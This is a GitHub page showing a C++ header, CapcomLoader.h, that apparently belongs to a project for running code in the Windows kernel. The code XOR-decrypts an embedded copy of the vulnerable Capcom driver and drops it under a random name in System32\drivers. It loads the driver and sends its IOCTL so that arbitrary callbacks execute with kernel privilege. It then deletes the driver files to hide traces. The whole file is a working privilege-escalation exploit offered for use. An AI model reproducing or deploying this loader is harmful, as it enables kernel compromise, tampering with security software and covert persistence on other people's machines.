-
Notifications
You must be signed in to change notification settings - Fork 193
/
CapcomLoader.h
199 lines (159 loc) · 4.63 KB
/
CapcomLoader.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
#pragma once
#include <filesystem>
#include <iostream>
#include <fstream>
#include "CapcomResource.h"
#include "DriverLoader.h"
#include "LockedMemory.h"
#define IOCTL_RunPayload64 0xAA013044
#pragma pack(push, 1)
struct CapcomContext
{
using FnCapcomCb = void( __stdcall*)( PVOID );
using FnCapcomCbNoCtx = void(__stdcall*)();
uint64_t BufferPointer;
uint8_t MovabsRaxData[ 0x2 ] = { 0x48, 0xB8 }; // mov rax, data
uint64_t DataSource; // -
uint8_t MovRdxRax[ 0x3 ] = { 0x48, 0x89, 0xC1 }; // mov rcx, rax
uint8_t MovabsRax[ 0x2 ] = { 0x48, 0xB8 }; // mov rax, destination
uint64_t Destination; // -
uint8_t JmpRax[ 0x2 ] = { 0xFF, 0xE0 }; // jmp rax
HANDLE CapcomDevice;
std::wstring CapcomDriverName;
CapcomContext( std::wstring DriverName, HANDLE Device )
{
this->CapcomDriverName = DriverName;
this->CapcomDevice = Device;
}
void ExecuteInKernel( FnCapcomCb Destination, PVOID Ctx = 0 )
{
this->Destination = ( uint64_t ) Destination;
// STOP OPTIMIZING MY FUCKING VARIABLES AWAY DUMB CUNT
if ( __rdtsc() == 0 )
Destination( 0 );
DWORD Status = 0x0;
DWORD BytesReturned = 0x0;
this->DataSource = ( uint64_t ) Ctx;
this->BufferPointer = ( uint64_t ) ( &this->BufferPointer + 1 );
DeviceIoControl
(
CapcomDevice,
IOCTL_RunPayload64,
&this->BufferPointer,
sizeof( uint64_t ),
&Status,
sizeof( Status ),
&BytesReturned,
0
);
}
void ExecuteInKernel( FnCapcomCbNoCtx Fn, PVOID Ctx = 0 )
{
this->ExecuteInKernel( ( FnCapcomCb )( Fn ), Ctx );
}
};
#pragma pack(pop)
static void Cl_AssertDecrypted()
{
if ( CAPCOM_DRIVER[ 0 ] != 0x4D )
{
for ( BYTE& b : CAPCOM_DRIVER )
b ^= CAPCOM_DRIVER_XOR_KEY;
}
}
static std::wstring Cl_GetDriverPath()
{
wchar_t SystemDirectory[ 2048 ];
GetSystemDirectoryW( SystemDirectory, 2048 );
std::wstring DriverPath = SystemDirectory;
DriverPath += L"\\drivers\\";
return DriverPath;
}
static NTSTATUS Cl_RemoveSimilarDrivers( BYTE* Driver )
{
namespace fs = std::experimental::filesystem;
std::wstring DriverPath = Cl_GetDriverPath();
NTSTATUS Status = STATUS_SUCCESS;
for ( auto& File : fs::directory_iterator( DriverPath ) )
{
std::wstring Path = File.path();
if ( Path.find( L".sys" ) != -1 )
{
std::ifstream FileStr( File, std::ios::binary );
char Data[ 1024 ];
FileStr.read( Data, 1024 );
FileStr.close();
if ( !memcmp( Driver, Data, 1024 ) )
{
bool Deleted = DeleteFileW( Path.c_str() );
printf( "[+] DeleteFile (%ls) : %x\n", Path.c_str(), Deleted );
if ( !Deleted )
{
int StrEnd = Path.find( L".sys" );
int StrStart = Path.rfind( L"\\", StrEnd );
std::wstring DriverName = Path.substr( StrStart + 1, StrEnd - StrStart - 1 ).c_str();
Dl_UnloadDriver( DriverName.c_str() );
Deleted = DeleteFileW( Path.c_str() );
printf( "[+] DeleteFile2 (%ls) : %x\n", Path.c_str(), Deleted );
}
Status |= !Deleted;
}
}
}
return Status;
}
static BOOL Cl_FreeContext( CapcomContext* Ctx )
{
Cl_AssertDecrypted();
CloseHandle( Ctx->CapcomDevice );
if ( Dl_UnloadDriver( Ctx->CapcomDriverName.c_str() ) )
return FALSE;
if ( Cl_RemoveSimilarDrivers( CAPCOM_DRIVER ) )
return FALSE;
VirtualFree( Ctx, 0, MEM_FREE );
return TRUE;
}
static CapcomContext* Cl_InitContext()
{
Cl_AssertDecrypted();
CapcomContext* AllocatedContext = ( CapcomContext* ) ( VirtualAlloc( 0, sizeof( CapcomContext ), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ) );
std::wstring CapcomDriverName = L"";
srand( __rdtsc() );
for ( int i = 0; i < 12; i++ )
CapcomDriverName += wchar_t( L'A' + rand() % 20 );
std::wstring DriverPath = Cl_GetDriverPath() + CapcomDriverName + L".sys";
if ( Cl_RemoveSimilarDrivers( CAPCOM_DRIVER ) )
{
printf( "[+] Failed to remove similar drivers!\n" );
VirtualFree( AllocatedContext, 0, MEM_FREE );
return 0;
}
std::ofstream file( DriverPath, std::ios::binary );
if ( !file.good() )
{
printf( "[+] Failed to create file!\n" );
VirtualFree( AllocatedContext, 0, MEM_FREE );
return 0;
}
file.write( ( char* ) CAPCOM_DRIVER, sizeof( CAPCOM_DRIVER ) );
file.close();
if ( Dl_LoadDriver( CapcomDriverName.c_str() ) )
{
printf( "[+] Failed to load driver!\n" );
while ( 1 );
Cl_RemoveSimilarDrivers( CAPCOM_DRIVER );
VirtualFree( AllocatedContext, 0, MEM_FREE );
return 0;
}
HANDLE Device = Dl_OpenDevice( "Htsysm72FB" );
if ( !Device )
{
printf( "[+] Failed to open device!\n" );
Dl_UnloadDriver( CapcomDriverName.c_str() );
Cl_RemoveSimilarDrivers( CAPCOM_DRIVER );
VirtualFree( AllocatedContext, 0, MEM_FREE );
return 0;
}
new ( AllocatedContext ) CapcomContext( CapcomDriverName, Device );
return AllocatedContext;
}